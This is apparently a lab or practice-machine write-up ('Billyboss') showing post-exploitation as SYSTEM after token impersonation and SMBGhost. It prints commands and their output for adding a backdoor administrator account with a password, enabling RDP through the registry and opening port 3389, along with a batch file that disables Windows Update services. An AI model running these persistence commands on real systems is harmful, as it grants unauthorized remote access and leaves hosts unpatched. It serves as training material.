InfoSec LAB

Beyond

This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system via token impersonation and SMBGhost

C:\Windows\system32> net user adm1n qwe123 /ADD && net localgroup administrators /ADD adm1n
 
The command completed successfully.
The command completed successfully.
 
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 
The operation completed successfully.
 
C:\Windows\system32>netsh firewall add portopening TCP 3389 "Remote Desktop"
 
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

RDP

Scheduled Tasks

C:\Windows\stop.bat

`C:\Windows\stop.bat`

C:\Windows\system32> type C:\Windows\stop.bat
 
sc stop WaasMedicSvc
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\WaasMedicSvc /v Start /f /t REG_DWORD /d 4
sc stop wuauserv
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Start /f /t REG_DWORD /d 4
sc stop UsoSvc
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /v Start /f /t REG_DWORD /d 4

InfoSec LAB

Explorer

Billyboss_Beyond

Beyond

Scheduled Tasks

`C:\Windows\stop.bat`

Windows FTP

Interactive Graph View

Table of Contents

Backlinks